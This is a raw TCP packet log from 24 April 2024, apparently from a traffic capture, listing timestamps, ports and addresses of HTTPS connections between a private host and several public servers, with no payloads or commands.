Apr 24, 2024 15:24:20.975924015 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.976387024 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.976404905 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.976865053 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.977241039 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:20.977324009 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:20.977368116 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.021260023 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.021274090 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.336654902 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.336826086 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.336926937 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.340177059 CEST	49759	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.340203047 CEST	443	49759	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.390255928 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.390289068 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.390409946 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.390708923 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.390721083 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.415913105 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:21.416009903 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:21.416114092 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:21.416551113 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:21.416589975 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:21.700022936 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.700455904 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.700475931 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.700766087 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.701858044 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.701916933 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.702451944 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.702761889 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.702796936 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.702872038 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.702872038 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:21.702886105 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.702915907 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:21.731215954 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:21.731944084 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:21.731993914 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:21.733119011 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:21.734148026 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:21.734246016 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:21.734843016 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:21.776159048 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.036593914 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036622047 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036639929 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036672115 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036673069 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.036711931 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036731005 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.036834002 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036870003 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.036875963 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036940098 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.036978006 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.036983967 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.037260056 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.037303925 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.037308931 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.037832975 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.037882090 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.037890911 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.037955046 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.038032055 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.038038969 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.038719893 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.038774967 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.038780928 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.038873911 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.038904905 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.038911104 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.039472103 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.039508104 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.039514065 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.039580107 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.039617062 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.039622068 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.039695024 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.039733887 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.039915085 CEST	49760	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:22.039931059 CEST	443	49760	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:22.083981991 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.084052086 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.084137917 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.091815948 CEST	49761	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.091859102 CEST	443	49761	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.156676054 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.156716108 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.156922102 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.157156944 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.157171965 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.466536999 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.466932058 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.466947079 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.467255116 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.468277931 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.468333006 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.468585014 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.512128115 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.820420027 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.820492983 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:22.820553064 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.821407080 CEST	49764	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:22.821419954 CEST	443	49764	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:38.710841894 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:38.710902929 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:38.710974932 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:38.711394072 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:38.711411953 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.021826982 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.022130966 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.022157907 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.022458076 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.023376942 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.023437977 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.023794889 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.023861885 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.023889065 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.023988962 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.024020910 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.363100052 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.363233089 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.363291979 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.363322020 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.363409996 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.363504887 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.364007950 CEST	49768	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:39.364025116 CEST	443	49768	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:39.384124041 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.384155035 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.384290934 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.384291887 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.384377003 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.384510040 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.386898994 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.386934996 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.387224913 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.387233019 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.391144991 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:39.391237974 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:39.391334057 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:39.391567945 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:39.391597033 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:39.703453064 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:39.703752995 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:39.703815937 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:39.704335928 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:39.704662085 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:39.704760075 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:39.704790115 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:39.713495016 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.714689016 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.714699984 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.714975119 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.715281963 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.715325117 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.715424061 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.715436935 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.715447903 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.716660023 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.716829062 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.716851950 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.717336893 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.717729092 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:39.717801094 CEST	443	49770	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:39.747076035 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:39.747096062 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:39.763015985 CEST	49770	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:40.059958935 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:40.060043097 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:40.060127020 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:40.060930967 CEST	49771	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:40.060973883 CEST	443	49771	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:40.251517057 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:40.251605988 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:40.253783941 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:40.257477999 CEST	49769	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:40.257488966 CEST	443	49769	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:40.701488018 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:40.701555967 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:40.702138901 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:40.702395916 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:40.702414036 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.038170099 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.038840055 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.038873911 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.039804935 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.039880991 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.045249939 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.045249939 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.045265913 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.045363903 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.096949100 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.096971989 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.146053076 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.364125967 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.364216089 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.364279985 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.364828110 CEST	49772	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.364857912 CEST	443	49772	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.367253065 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.367297888 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.367388964 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.367605925 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.367620945 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.699903965 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.700189114 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.700227976 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.700540066 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.700867891 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.700927973 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:41.701019049 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:41.744144917 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.253477097 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.255316019 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.255387068 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.255458117 CEST	443	49773	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.255501032 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.255546093 CEST	49773	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.256520033 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.256618977 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.256706953 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.256922007 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.256959915 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.590867996 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.591239929 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.591279030 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.591593981 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.592089891 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.592089891 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:42.592118025 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.592164993 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:42.637481928 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.090157986 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.090177059 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.090193987 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.090291977 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.090292931 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.090292931 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.090666056 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.091579914 CEST	49774	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.091602087 CEST	443	49774	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.093900919 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.093945980 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.094188929 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.094265938 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.094273090 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.426188946 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.426580906 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.426598072 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.426898003 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.427273035 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.427330971 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:43.427382946 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:43.427412033 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315638065 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315687895 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315699100 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.315702915 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315716982 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315738916 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.315762997 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.315778017 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315830946 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.315843105 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315860033 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.315908909 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.317397118 CEST	49775	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.317416906 CEST	443	49775	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.334425926 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.334456921 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.334608078 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.334887981 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.334902048 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.667249918 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.667587996 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.667604923 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.667898893 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.668644905 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.668694019 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.668826103 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:44.668845892 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:44.715996981 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.275558949 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.275578976 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.275608063 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.275623083 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.275628090 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.275641918 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.275657892 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.275665045 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.275682926 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.275701046 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.276081085 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.276093960 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.276143074 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.276149988 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.276278973 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.441183090 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441204071 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441266060 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.441281080 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441325903 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.441518068 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441531897 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441590071 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.441596985 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441632032 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.441904068 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441917896 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.441973925 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.441978931 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.442012072 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.607233047 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.607258081 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.607307911 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.607326984 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.607372046 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.608006001 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608021021 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608093977 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.608112097 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608211040 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.608454943 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608470917 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608551025 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.608557940 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608639956 CEST	49776	443	192.168.2.4	89.116.187.236
Apr 24, 2024 15:24:45.608756065 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608798027 CEST	443	49776	89.116.187.236	192.168.2.4
Apr 24, 2024 15:24:45.608827114 CEST	49776	443	192.168.2.4	89.116.187.236
